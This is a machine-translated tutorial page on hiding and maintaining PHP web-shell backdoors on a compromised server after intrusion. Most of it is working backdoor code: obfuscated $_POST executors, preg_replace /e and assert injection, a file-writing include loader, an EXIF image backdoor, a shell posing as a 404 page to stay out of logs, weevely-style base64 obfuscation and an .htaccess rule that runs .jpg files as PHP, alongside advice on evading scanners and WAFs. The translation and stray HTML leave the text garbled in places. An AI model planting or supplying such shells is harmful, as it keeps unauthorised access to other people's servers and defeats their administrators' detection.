PHP backdoor hiding and maintenance skills, php backdoor skills _ PHP Tutorial

PHP backdoor hiding and maintenance skills, php backdoor skills. PHP backdoor hiding and maintenance skills. after a successful test, php backdoor skills usually want to keep the privileges longer. the work of leaving a backdoor is very important. Usually, the backdoor layout includes PHP backdoor hiding and maintenance skills, and php backdoor skills.

After a successful test, we usually want to keep the privilege longer. the work of leaving a backdoor is crucial. Generally, the backdoor layout includes but is not limited to database permissions, WEB permissions, system user permissions, and so on. in this article, some ideas hidden from the public backdoors are popularized.

AD:

0 × 00 preface

After a successful test, we usually want to keep the privilege longer. the work of leaving a backdoor is crucial. Generally, the backdoor layout includes but is not limited to database permissions, WEB permissions, system user permissions, and so on. this article describes some ideas hidden from the public backdoors.

Or

Of course, this is only different from the called functions. for PHP disabled functions, find them in php. ini: disable_functions.

However, there are also many ways for O & M to intuitively find our shell, such

◆ An exception was found during file backup comparison by file name/modification time/size

◆ WEBSHELL scan scripts, such as Scanbackdoor. php/Pecker/shelldetect. php and various scanners

◆ Access. log is used to find the backdoor

◆ Or, we will be blocked by WAF for a test sentence, and a warning log, etc.

For common detection methods, summarize the following seven common methods to hide shell

0 × 01 avoidance

Look at the various backdoor scanning code and you will know, leaving a well-known keyword in shell is absolutely impossible.

Common keywords include:

◆ System command execution: system, passthru, shell_exec, exec, popen, proc_open

◆ Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

◆ File inclusion: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

In the past, some friends wittically used $ _ POST [0] ($ _ POST [1]) to execute commands. Unfortunately, it is still difficult to escape the scanner's eye, but the construction method is infinite in Vientiane.

Tudouya provides [a construction technique] (http://www.freebuf.com/articles/web/33824.html) exploitation on FREEBUF.

2. @ $ _ ++; // $ _ = 1
3. $ __= ("#" ^ "|"); // $ __= _
4. $ __. = ("." ^ "~ "); // _ P
5. $ __. = ("/" ^ "'"); // _ PO
6. $ __. = ("|" ^ "/"); // _ POS
7. $ __. = ("{" ^ "/"); // _ POST
8. $ {$ __}[! $ _] ($ {$ __} [$ _]); // $ _ POST [0] ($ _ POST [1]);
9. ?>

Construct and generate, of course, too intuitive to write

Then fill in some common code for disguise. a simple "kill-free" shell sample will appear.

Run the command correctly and bypass the common scanner. you can also use it to write a new temporary shell.

0 × 02 features

Using syntax features to execute commands is also an interesting method. using the syntax features of php when processing variables, it will analyze whether the data in double quotation marks contains variables (and parse their values)

Eg .:

1. $ {@ Eval (phpinfo ())}

{} The variable content in double quotation marks can be parsed. @: Keep the variable running after an error occurs.

Then we can shake the chart and start to construct a Hidden Backdoor. but here we want to construct the command execution caused by the function. that's right, it's preg_replace.

This method has already been blacklisted by the scanner. you can simply modify it.

2. Function funfunc ($ str ){}
3. Echo preg_replace ("/(. + ?) <\/Title>/ies ", 'funfunc (" \ 1 ") ', $ _ POST [" cmd "]); </li> <li >?> </Li> </ol> <p> execution failed. </p> <p> The execution method is obvious, {$ {phpinfo ()} after regular expression matching ()}} code execution is triggered when funfunc is passed in </p> <ol class = "dp-c"> <li class = "alt"> funfunc ("{$ {phpinfo ()}} ") </li> </ol> <p> another method </p> <ol class = "dp-c"> <li class = "alt"> <? Php @ assert ("\ $ arr = \" ". $ _ GET ['cmd']." \ ";");?> </Li> </ol> <p> </p> <strong> 0x03 inclusion </strong> </p> <p> The file contains all users. methods that have been used, only include and tips </p> <p> A common file may contain only one include file containing a txt or jpg file, or even a Inclusion vulnerability, but the scanner is easy to detect, the large number of contained files is also easy to detect </p> <p> Check this script </p> <ol class = "dp-c"> <li class = "alt"> <? Php </li> <li> if (@ isset ($ _ GET [content]) </li> <li class = "alt" >{</li> <li> $ fp = fopen ('readme ', 'w '); </li> <li class = "alt"> file_put_contents ('readme ', "<? Php \ r \ n "); </li> <li> @ file_put_contents ('readme ', $ _ GET [content], FILE_APPEND ); </li> <li class = "alt"> fclose ($ fp); </li> <li> require 'readme ';} </li> <li class = "alt" >?> </Li> </ol> <p> solves some problems. The required shell can be generated as needed, </p> <p> Unfortunately, file_put_contents and other functions are too sensitive, it is also easy to scan and discover </p> <p> code generation method to create a shell, which is generated with access. </p> <ol class = "dp-c"> <li class = "alt"> <? Php @ fputs (fopen (base64_decode ('cgx1z2lux20ucghw'), w), base64_decode ('samples/Pg = '); </li> <li >?> </Li> </ol> <p> Some scanners can be avoided, but this mode is also quite eye-catching. new files must also be easily hidden to avoid scanning and killing. </p> <p> of course, the new concepts such as heuristic are not taken into account </p> <p> if this method cannot meet the requirements, A witty attacker resends an Image </p> <ol class = "dp-c"> <li class = "alt"> <? Php $ exif = exif_read_data ('./lol.jpg'); preg_replace ($ exif ['make'], $ exif ['model'], '');?> </Li> </ol> <p> reference: A backdoor hidden in JPG Image EXIF </p> <p> This time, you do not have to simply copy/B to generate an image horse, it is equally feasible to borrow the specific marker of the preg_replace execution file </p> <p> The Call to undefined function exif_read_data () message may be displayed here () </p> <p> php needs to be modified. ini, extension = php_exif.dll </p> <p> Change the loading order to the end of extension = php_mbstring.dll </p> <p>, this image backdoor uses the preg_replace \ e parameter to rely on php variable parsing and execution, and uses base64 encoding. Finally, it relies on the file ID to splice a complete shell, it is a small reminder for the children's shoes hidden in the backdoor. </p> <p> of course, as long as there are various include points, the formats of including files are diverse, and even include error_log (although possible Should consider closing), only unexpected... </P> <strong> 0 × 04 hiding </strong> </p> <p> to prevent visitors from discovering the existence of backdoors, smart Security researchers will also learn how to confuse themselves. </p> <ol class = "dp-c"> <li class = "alt"> <! Doctype html public "-// IETF // dtd html 2.0 // EN"> </li> <ptml> <pead> </li> <li class =" alt "> <title> 404 Not Found
6. Not Found

7. The requested URL was not found on this server.

11. @ Preg_replace ("/[checksql]/e", $ _ POST ['cmd'], "saft ");
12. ?>

With the help of the above html rendering, browsing the page has begun to disguise 404 to confuse the audio and video

However, visitors cannot hide log analysis. to better hide a large number of logs, construct the following script:

2. Header ('http/1.1 404 ');
3. Ob_start ();
4. @ Fputs (fopen (base64_decode ('cgx1z2lux20ucghw'), w), base64_decode ('samples/Pg = '));
5. Ob_end_clean ();
6. ?>

The access is actually 404. that's right. The same is true in the log.

However, the current directory has generated the script to be connected.

0 × 05 obfuscation

We should know that the kids shoes that have used the weevely tool generate a kill-free shell like this.

2. $ Penh = "bytes = ";
3. $ Kthe = "success ";
4. $ Ftdf = str_replace ("w", "", "stwrw_wrwepwlwawcwe ");
5. $ Wmmi = "Hangzhou ";
6. $ Zrmt = "Hangzhou ";
7. $ Smgv = $ ftdf ("f", "", "bfafsfef6f4_fdfefcodfe ");
8. $ Jgfi = $ ftdf ("l", "", "lclrlelaltel_functlilon ");
9. $ Rdwm = $ jgfi ('', $ smgv ($ ftdf (" gi "," ", $ zrmt. $ kthe. $ wmmi. $ penh); $ rdwm ();
10. ?>

This is what follows the connection under the terminal

Ps: I forgot to modify the TERMINAL CODE :(

The kill-free method is to generate random name variables in a fixed area, and then use str_replace to splice base64_decode to execute the command.

Of course, this is to hide the audio and video at the code level to escape the scanner

More common methods for audio/video recognition:

◆ File modification time

◆ Rename the file to the uploaded folder, which makes it impossible to see the file exception

◆ Disguised processing of file size (at least looks like a normal script)

◆ Select the hiding path and minimize access

◆ Malformed directory % 20

Space directories are relatively easy to find.

0 × 06 parsing

Use. htaccess to add resolution backdoors

For example:

1. AddType application/x-httpd-php. jpg

Take weeverly as an example.

0x07 mixture

To sum up the above methods, most of them are just a process of constructing vulnerabilities. the code constructed by vulnerabilities can be amazing, and the backdoor can be amazing. you can write fine and graceful statements, or you can make simple and rude statements, but it is only applicable to different scenarios. it is not difficult to construct your own Hidden shell if you can integrate your ideas well. the above is just a summary of experience. you may have interesting ideas and hope to give me some advice.

After a successful test, the hacker usually wants to maintain the privileges for a longer time. the work of leaving a backdoor is crucial. the webshells that are usually deployed include...